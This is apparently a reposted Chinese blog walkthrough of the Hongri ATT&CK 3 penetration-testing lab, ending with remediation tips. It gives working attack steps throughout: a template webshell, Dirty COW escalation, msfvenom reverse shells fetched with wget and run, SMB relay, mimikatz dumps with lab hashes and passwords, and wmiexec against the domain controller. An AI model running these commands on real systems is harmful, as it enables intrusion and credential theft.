0


红日安全靶场3

                          红日3 

环境准备

1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改

2、修改VMnet2的ip为192.168.93.0网段,没有就创建。

因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:

修改kail的ip以及dns

初始信息收集

扫出来了一些端口

直接访问80端口,貌似找不到有什么可利用的点。尝试目录爆破。目录爆破可以用kail自带的dirsearch、也可以尝试用awvs做一个全面的大保健。

这里利用AWVS:,其中包含目录、文件泄露

访问

拿下第一台机器

首先对

http://192.168.1.128/index.php/author-login

http://192.168.1.128/administrator/

进行暴力破解,没有成功。

但根据泄露的数据库信息,尝试连接数据库

用centos7的mysql连接失败了~~但利用Navicat Premium16成功了~

寻找用户名密码;一般都会有users字样。。发现是加盐了的md5。拉到md5网站破解,失败。但还是通过万能的互联网找到破解的方式,把密码修改为

$2y$10$EJ64ugc3YEnGH2jaM06XCO68igbTx4LpkcfVPnzoJHRy8Wm8h0Hti 

明文为123456;记得保存原密码,养成习惯。当然,实战过程中,最好利用增加的用户登录。

成功进入了后台。

找到模板

创建一个新的文件:写入木马

访问/administrator/shell.php / /失败

但查看目录扫描的结果,可以猜测可能在templates/beez3/目录下

访问ip/templates/beez3/shell.php验证

通过蚁剑也成功连接

上传msf制作的shell.exe,但打开终端,发现权限太低了,根本没办法运行程序。

可能是受disable_functions的影响,利用蚁剑的disable_functions插件尝试绕过(失败了)

没办法再次求助于博客

在/tmp/mysql/ 目录下有个test.txt文件 #据说tmp文件通常有重要文件泄露

并且在前面这台机器是开启了22端口(ssh服务)

尝试进行连接,成功进行连接

发现与webshell不通用文件,所以无法找到webshell传进行的木马。本来想用xftp进行传进去,但考虑到这是个普通用户并没有权限下载ftp,于是先尝试能不能进行提权。uname -a 查看内核版本。

低于以下版本表示存在脏牛漏洞(CVE-2016-5195)

Centos7 /RHEL7    3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10         4.8.0-26.28
Ubuntu 16.04         4.4.0-45.66
Ubuntu 14.04         3.13.0-100.147
Debian 8                3.16.36-1+deb8u2
Debian 7                3.2.82-1

参考自脏牛(Dirty Cow)快速指南-阿里云开发者社区

于是把脏牛工具包弄到kail上,kail开启服务,然后靶机进行下载。但很神奇,下载的竟然是一个网页。只能通过压缩的形式进行下载了,但需要unzip对zip格式进行解压,万幸,靶机拥有unzip。

kail : python3 -m http.server 8000     
​
靶机:wget http://192.168.1.123:800/dirtycow.github.io-master.zip
​
靶机:unzip dirtycow.github.io-master.zip -d zangniu 

失败样例:

可以看到他是一个目录,但打开只有一个网页

靶机情况:

查看是否拥有gcc,没有也可以通过先编译再上传到靶机

经过无数次的踩坑:

终于找到一个成功的

GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195

同样,靶机通过kail下载出来,上面有写;

# gcc -pthread dirty.c -o dirty -lcrypt  #编译
​
#./dirty   root      #因为已经存在/tmp/passwd.bak 会失败
​
#rm -f /tmp/passwd.bak 
​
#./dirty   root   #root 为密码, ./dirty  密码
​
##提示信息,,他创建了一个新用户firefart,密码为root,这个用户拥有root权限
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root
Complete line:
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
​
mmap: 7fcfe9a6b000
madvise 0
​
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'root'.
​
​
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
证明1:
[firefart@localhost dirtycow-master]# cat /etc/passwd
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
证明2:
[firefart@localhost wwwuser]# echo 123 >1.txt
[firefart@localhost wwwuser]# ls -l 1.txt
-rw-r--r--. 1 firefart root 4 Oct  7 10:17 1.txt

通过msf getshell

kail : 
​
制作木马
​
#msfvemon -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=444 -f elf  > mshell.elf
​
启动监听
​
#msfconsole
​
#use exploit/multi/handler
​
#set lhost 192.168.1.123
​
#set lport 4444
​
#set play linux/x64/meterpreter/reverse_tcp
​
#run

靶机:使用刚刚提权到的firefart用户 su firefart

#wget http://192.168.1.123:8000/mshell.elf
​
#chmod 777 mshell.elf
​
#./mshell.elf

成功拿到shell

内网信息收集

meterpreter信息收集

getuid            # 查看当前用户
​
sysinfo            # 查看版本信息
​
run kaillav     #关闭杀毒软件
​
ipconfig /ifconfig         #收集ip信息 ,得到还有个网段192.168.93.0\24
​
通过icmp方式查看内网主机存活情况
[firefart@localhost wwwuser]# for i in 192.168.93.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done
192.168.93.10 is alived
192.168.93.20 is alived
192.168.93.30 is alived
192.168.93.100 is alived
192.168.93.120 is alived

接下来启用kail的socks代理

vim /etc/proxychains4.conf    
└─# cat /etc/proxychains4.conf | grep socks                                            3 ⚙
#               socks5  192.168.67.78   1080    lamer   secret
#               socks4  192.168.1.49    1080
#       proxy types: http, socks4, socks5, raw
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#socks4         127.0.0.1 9050             #注释原来的socks4
socks5   127.0.0.1 4444                   #新增
​
msfconsole
use auxilxary/server/socks_proxy
show options             
set srvhost 127.0.0.1    #设置ip
set srvport 4444
run

使用方法:

确保msfvenom制作的木马正常运行,扫描刚刚发现的主机

##proxychains nmap 192.168.93.10 192.168.93.20 192.168.93.30 192.168.93.120  #等待时候很漫长,甚至把session等死了
​
只能一个个地测量了msf6 auxiliary(server/socks_proxy) > [*] 192.168.1.128 - Meterpreter session 1 closed.  Reason: Died
​
##
-------------------------------------内网第一台----------------------------------------------
Nmap scan report for 192.168.93.10
Host is up (0.00027s latency).
Not shown: 984 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown
​
Nmap done: 1 IP address (1 host up) scanned in 262.81 seconds
​
-------------------------------------内网第二台----------------------------------------------
└─# proxychains nmap 192.168.93.20                                               148 ⨯ 8 ⚙
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:18 CST
Nmap scan report for 192.168.93.20
Host is up (0.0088s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
2383/tcp  open  ms-olap4
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
​
-------------------------------------内网第三台----------------------------------------------
└─# proxychains nmap 192.168.93.30                                                     8 ⚙
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:25 CST
Nmap scan report for 192.168.93.30
Host is up (0.00093s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49155/tcp open  unknown
49163/tcp open  unknown
​
Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds
​
-------------------------------------内网第四台----------------------------------------------
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:26 CST
Nmap scan report for 192.168.93.120
Host is up (0.00043s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
​
Nmap done: 1 IP address (1 host up) scanned in 4.91 seconds

寻找第二台主机的入口

访问 192.168.93.20 空页面

访问192.168.93.120 有内容了,先看看有没有利用的点,#熟悉的端口,熟悉的页面 (红日2) 但红日2那台有用weblogic服务~

所以只能对仅有的http服务入口了 ,搜索joomla漏洞

test1 :CVE-2015-8562 #失败

test2: CVE-2017-8917 #应该也是失败了

test3:暂无

继续回到nmap,之前发现nmap 加了命令不能执行(把session都等死了),然后一直在纠结怎么打。最后发现这样加命令能够被执行:

proxychains nmap --script=vuln 192.168.93.20 -n -Pn -vv

也没有扫出漏洞。。。没办法,再次回到博客,看看大佬们怎么打的。

因为有三台机器开启了445端口(smb文件共享服务)可以利用msf的auxiliary/scanner/smb/smb_version模块收集主机版本信息。

因为知道了对方的ip,所以这里直接每次设置一个ip,加快收集速度
ip系统信息smb版本192.168.93.10windows 2012 R23.0.2192.168.93.20windows 20082.0.2192.168.93.30Windows 72.1192.168.93.120无
用auxiliary/scanner/smb/smb_login模块尝试爆破

#user auxiliary/scanner/smb/smb_login
​
#show options
#set rhosts 192.168.93.10
#set SMBuser administrator
#set PASS_FILE /opt/MimiPwds.txt

好慢!!!!!大佬们都说密码是123qwe!ASD

然后我查了下我的字典中最大的一个12万多个。。。。对此我们可以

达咩,绝对达咩!!!

投机取巧那么打靶场就无意义了!!那么我们还收集了smb的版本,那么可以尝试寻找有无相关漏洞。实在找不到方法再使用”先知“技能。

ms17-010(永恒之蓝)已经可以排除,扫描的时候也没有扫到,其次看到其他大佬也没有利用,那么基本上也没有了。并且利用也很简单没必要再浪费时间。所以,主要利用smb最新的漏洞,从2020年以后的漏洞,符合以上版本条件的无需权限的都尝试一遍。

猝!

社会工程学之钓鱼:

该钓鱼方式参考自VulnStack-ATT&CK-3(红日靶场三)_Buffedon的博客-CSDN博客_红日靶场3

先把需要的impacket-master.zip拷贝到kail上

kail:
​
 #msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.1.123 lprot=4567 -e x86/shikata_ga_nai -f exe -o   myshell.exe          //-e是编码为了免杀
 
 #python3 -m http.server 8000
 另外再打开一个后台开启监听
 #msfconsole
 #use exploit/multi/handler
 #set payload  windows/meterpreter/bind_tcp
 #set rhost 192.168.93.20
 #set lprot 4567
 
 centos6.5靶机:
#wget http://192.168.1.123:8000/myshell.exe
#wget http://192.168.1.123:8000/impacket-master.zip
#./smbrelayx.py -h 192.168.93.20 -e /opt/myshell.exe   smbrelayx.py在impacket-master/examples目录。
报错了
 File "./smbrelayx.py", line 1121
    parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
                                                                ^
SyntaxError: invalid syntax
​
# python -V
Python 2.6.6
给他搞个python3
能ping通百度,但无法下载,需要通过下面指令强行下载
#wget -c https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz --no-check-certificate
#tar -zxvf Python-3.6.9.tgz 
#cd Python-3.6.9
#./configure --prefix=/usr/local/python3   //配置、检测依赖、貌似没有报错也就是可以直接安装了
#make && make install
#ln -s /usr/local/python3/bin/python3.6 /usr/bin/python3  #建立软连接,相当于windows的快捷方式
#ln -s /usr/local/python3/bin/pip3 /usr/bin/pip
很可惜无法直接通过pip install ,因为是复制上面参考博主的,直接丢上去命令行也不知道会不会出错,一条条丢上去也麻烦,于是我们可以写一个小脚本,报出了挺多警告的,但不少error或者运行出错,都可以忽略
#vi test.sh 
#sh test.sh
#nginx -s stop   //因为80端口已经存在http服务,如果不停止则会冲突报错
#python3 smbrelayx.py -h 192.168.93.20 -e /opt/myshell.exe 

[firefart@localhost opt]# cat test.sh

#!/bin/bash

pip install --upgrade pip -i Simple Index --trusted-host pypi.douban.com

pip install six -i Simple Index --trusted-host pypi.douban.com pycryptodomex

pip install -i Simple Index --trusted-host pypi.douban.com pyOpenSSL pip install -i Simple Index --trusted-host pypi.douban.com ldap3

pip install -i Simple Index --trusted-host pypi.douban.com pyasn1

pip install -i Simple Index --trusted-host pypi.douban.com impacket

接下来就是角色扮演了

鱼大人:访问192.168.93.100

输入账号一定是需要win2008

centos6.5靶机就抓取到了Net-NTLM Hash

但看失败了,一直没有反弹shell~~

经过排查,发现是myshell.exe并没有执行权限

于是在centos6.5执行

#chmod 777 myshell.exe
#python3 smbrelayx.py -h 192.168.93.20 -e /opt/myshell.exe 
​

kail成功上线windows2008了

第一件事就是进行进程绑定,否则像这种脆弱的shell容易被杀死,或者centos7关闭smb服务后会断开

meterpreter >ps        #查找进程
​
meterpreter > migrate 2084   #找一个认为比较稳定的进程进行绑定
​
[*] Migrating from 2912 to 2084...
​
[*] Migration completed successfully.
​
meterpreter > getuid
​
Server username: NT AUTHORITY\LOCAL SERVICE
​
meterpreter > getpid
​
Current pid: 2084
​
​
或者可以利用post/windows/manage/migrate自动寻找合适的进程
​
geuid 
​
kill  X
​
run post/windows/manage/migrate

然后知道对面是windows,那么可以尝试使用cs 连接

kail开启cs服务端

windows客户端连接成功后创建一个监听

kail:

meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler ture
[-] The following options failed to validate: Value 'ture' is not valid for option 'DisablePayloadHandler'.
disablepayloadhandler => false
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true
disablepayloadhandler => true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf6 exploit(windows/local/payload_inject) > set lport 6688
lport => 6688
msf6 exploit(windows/local/payload_inject) > run
​
[-] Msf::OptionValidateError The following options failed to validate: SESSION
msf6 exploit(windows/local/payload_inject) > set session 2
session => 2
msf6 exploit(windows/local/payload_inject) > run
​
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN2008
[*] Spawned Notepad process 3136
[*] Injecting payload into 3136
[*] Preparing 'windows/meterpreter/reverse_http' for PID 3136

失败了,并没有在CS上上线~~~

在meterpter 执行

run autoroute -s 192.168.93.0/24

主机也能实现访问内网了

但但是无法进行联动,这个暂时就不做了

通过meterpreter收集重要信息

sysinfo   #收集主机信息,保护域
​
getuid   #查看当前权限
​
getsystem   #提权
​
load mimikatz
​

通过kail给centos6.5靶机发送mimikatz

然后centos6.5开启http服务,让windows下载

kail:
​
python3 -m http.server 8000
​
centos6.5:
​
python3 -m http.server 6666
​
wget  http://192.168.1.123:8000/mimikatz.exe
​
windows:在kail的meterpreter中shell操作
​
powershell (new-object Net.WebClient).DownloadFile('http://192.168.93.100:6666/mimikatz.exe','C:\mimikatz.exe')

随后直接通过meterpreter抓取明文密码,但在2012以后都不能直接获取明文密码了

c:\>mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
​
mimikatz # sekurlsa::logonpasswords
​
Authentication Id : 0 ; 13174272 (00000000:00c90600)
Session           : Interactive from 2
User Name         : Administrator
Domain            : TEST
Logon Server      : WIN-8GA56TNV3MV
Logon Time        : 12/15/2019 1:24:56 PM
SID               : S-1-5-21-1528753600-3951244198-520479113-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : TEST
         * LM       : fc5d63d71569f04399b419bc76e2eb34
         * NTLM     : 18edd0cc3227be3bf61ce198835a1d97
         * SHA1     : 0f058e319f079c15fe3449bbeffc086cfa4d231e
        tspkg :
         * Username : Administrator
         * Domain   : TEST
         * Password : zxcASDqw123!!
        wdigest :
         * Username : Administrator
         * Domain   : TEST
         * Password : zxcASDqw123!!
        kerberos :
         * Username : Administrator
         * Domain   : TEST.ORG
         * Password : zxcASDqw123!!
        ssp :
        credman :
​
Authentication Id : 0 ; 4192214 (00000000:003ff7d6)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN2008
Logon Server      : WIN2008
Logon Time        : 12/14/2019 7:53:47 PM
SID               : S-1-5-21-3814515962-2249813874-2772841674-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : WIN2008
         * LM       : ae946ec6f4ca785b93371dee1d5ee7e6
         * NTLM     : 31c1794c5aa8547c87a8bcd0324b8337
         * SHA1     : 128c0272959b85b330090611169d07d85cb6bd0b
        tspkg :
         * Username : Administrator
         * Domain   : WIN2008
         * Password : 123qwe!ASD
        wdigest :
         * Username : Administrator
         * Domain   : WIN2008
         * Password : 123qwe!ASD
        kerberos :
         * Username : Administrator
         * Domain   : WIN2008
         * Password : 123qwe!ASD
        ssp :
        credman :
​
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN2008$
Domain            : TEST
Logon Server      : (null)
Logon Time        : 12/14/2019 7:49:09 PM
SID               : S-1-5-20
        msv :
         [00000002] Primary
         * Username : WIN2008$
         * Domain   : TEST
         * NTLM     : c47b1f47431b259861e615472864c698
         * SHA1     : 5a09ade7dca624916c39473fd609c22302dd33bc
        tspkg :
        wdigest :
         * Username : WIN2008$
         * Domain   : TEST
         * Password : 94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17 92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0d c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72 e9 2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d 22 80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c0 52 5e b8 37 30 b7 
        kerberos :
         * Username : win2008$
         * Domain   : TEST.ORG
         * Password : 94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17 92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0d c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72 e9 2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d 22 80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c0 52 5e b8 37 30 b7 
        ssp :
        credman :
​
Authentication Id : 0 ; 13464483 (00000000:00cd73a3)
Session           : Service from 0
User Name         : Administrator
Domain            : WIN2008
Logon Server      : WIN2008
Logon Time        : 12/15/2019 1:29:22 PM
SID               : S-1-5-21-3814515962-2249813874-2772841674-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : WIN2008
         * LM       : ae946ec6f4ca785b93371dee1d5ee7e6
         * NTLM     : 31c1794c5aa8547c87a8bcd0324b8337
         * SHA1     : 128c0272959b85b330090611169d07d85cb6bd0b
        tspkg :
         * Username : Administrator
         * Domain   : WIN2008
         * Password : 123qwe!ASD
        wdigest :
         * Username : Administrator
         * Domain   : WIN2008
         * Password : 123qwe!ASD
        kerberos :
         * Username : Administrator
         * Domain   : WIN2008
         * Password : 123qwe!ASD
        ssp :
        credman :
​
Authentication Id : 0 ; 13172573 (00000000:00c8ff5d)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 12/15/2019 1:24:53 PM
SID               : 
        msv :
        tspkg :
        wdigest :
        kerberos :
         * Username : Administrator
         * Domain   : TEST.ORG
         * Password : zxcASDqw123!!
        ssp :
        credman :
​
Authentication Id : 0 ; 13083293 (00000000:00c7a29d)
Session           : Service from 0
User Name         : Administrator
Domain            : WIN2008
Logon Server      : WIN2008
Logon Time        : 12/14/2019 8:16:25 PM
SID               : S-1-5-21-3814515962-2249813874-2772841674-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : WIN2008
         * LM       : ae946ec6f4ca785b93371dee1d5ee7e6
         * NTLM     : 31c1794c5aa8547c87a8bcd0324b8337
         * SHA1     : 128c0272959b85b330090611169d07d85cb6bd0b
        tspkg :
         * Username : Administrator
         * Domain   : WIN2008
         * Password : 123qwe!ASD
        wdigest :
         * Username : Administrator
         * Domain   : WIN2008
         * Password : 123qwe!ASD
        kerberos :
         * Username : Administrator
         * Domain   : WIN2008
         * Password : 123qwe!ASD
        ssp :
        credman :
​
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/14/2019 7:49:09 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
​
Authentication Id : 0 ; 89285 (00000000:00015cc5)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 12/14/2019 7:49:09 PM
SID               : 
        msv :
         [00000002] Primary
         * Username : WIN2008$
         * Domain   : TEST
         * NTLM     : c47b1f47431b259861e615472864c698
         * SHA1     : 5a09ade7dca624916c39473fd609c22302dd33bc
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
​
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN2008$
Domain            : TEST
Logon Server      : (null)
Logon Time        : 12/14/2019 7:49:09 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN2008$
         * Domain   : TEST
         * Password : 94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17 92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0d c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72 e9 2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d 22 80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c0 52 5e b8 37 30 b7 
        kerberos :
         * Username : win2008$
         * Domain   : TEST.ORG
         * Password : 94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17 92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0d c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72 e9 2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d 22 80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c0 52 5e b8 37 30 b7 
        ssp :
        credman :
​
mimikatz # 

域名用户密码win2008Administrator123qwe!ASDTEST.org/TESTadministratorzxcASDqw123!!

通过账号密码连接server2012的445端口得到域控的shell

(53端口的大概率是域控)

#因为 我通过meterpreter新添了路由,所以我主机也能够访问到93网段!上面有写

红日官方的任务的找到域控的文件。那么在这里就已经可以完成了~但我们的目标是getshell

先剧透一下它隐藏的文件有什么内容!!!!

经过到百度游了一圈,发现445就能getshell

通过impacket里面的脚本就能够进行getshell

首先在impacket-master里面pip install . 安装依赖

再到进入examples里面用wmiexec.py进行利用。我用python3运行没有反应~~估计这是Python2的格式

impacket-master分享

链接:百度网盘 请输入提取码 提取码:8x0z

总结:

先吐槽,这比红日2难的不是一丁半点,红日2一键梭就完事了。但是这也就给我们得到了学习提升的机会

1、渗透过程

1)通过centos6.5这台外网服务器泄露,连接到他的mysql,并且通过修改加盐的密码登录到centos6.5的后台,然后利用centos6.5后台写入木马文件,把shell反弹到kail上面去。

2)centos6.5拿到后,但权限太低,通过uname -a 发现它的内核版本符合脏牛利用条件,所以也成功提权

3)理想是打入了内网,socks代理后一顿梭就完事了,但现实很现实~~~经过网上的收集,发现只有俩个方法(当然,希望下次打的时候能够有新的方法)一个是钓鱼(本文所用),另一个是爆破(我的msf线程最大只能是1,很慢,况且我的密码top12个w都没有~。

4)利用钓鱼成功get到win2008的shell,通过层层流水,也是成功把mimikatz送入到了windows2008。

5)通过windows2008的mimikatz也是成功拿到俩个域的账户密码

6)通过server2012的445端口加上wmiexec也是成功getshell。

7)总结没想到几句话就给了结过了~~但打靶的时候也是碰碰跌跌~

2、这里也给出我的几个修复建议:

1、centos6.5部分文件特别是文件禁止其他用户读。

2、centos6.5隐藏,最好删除泄露账号密码的test.txt文件

3、centos6.5升级内核版本

4、加强员工安全意识,防止钓鱼等社工攻击~

5、windows2008安装KB 2871997

6、windows2012如果可以选择禁用445端口

7、防写入篡改,对重要且不常修改的文件设置一个定时任务,定时做一个md5验证。如/ect/passwd

3、总结之总结

本次只是拿下了window2008、cnetos6,以及windows2012的shell,虽然得到了域控,其余主机大概也不成问题了。其次获取域控的shell也有很多方法,这里应该是利用最简单的445端口。本次并没有让这些主机上线cs(尝试过但失败了,其次linux原装中并不具备这个条件),但得到2008的shell后,发现可以通过插件等方式让linux在cs上面上线(在得到centos6的shell的时候就一直找使linux在cs上线,真就有心栽花花不开····)其次windows也是没有成功,原因可能是方法不对,因为数据要经过linux系统,具体原因未知。

通过本次的靶场,也是学到了很多东西,但总体还是有些瑕疵。下次再打的时候会利用未实现的线路进行尝试,起码cs一定要上线~~~

感谢红日安全制作的靶场!!!!以及各位被我参考的博主!!

CS上线linux的方法(未实践):

cs实现上线linux主机与CrossC2的配置_Shanfenglan7的博客-CSDN博客_linux上线cs

标签: 安全 网络 数据库

本文转载自: https://blog.csdn.net/weixin_48169878/article/details/125773366
版权归原作者 誓下 所有, 如有侵权,请联系我们删除。

“红日安全靶场3”的评论:

还没有评论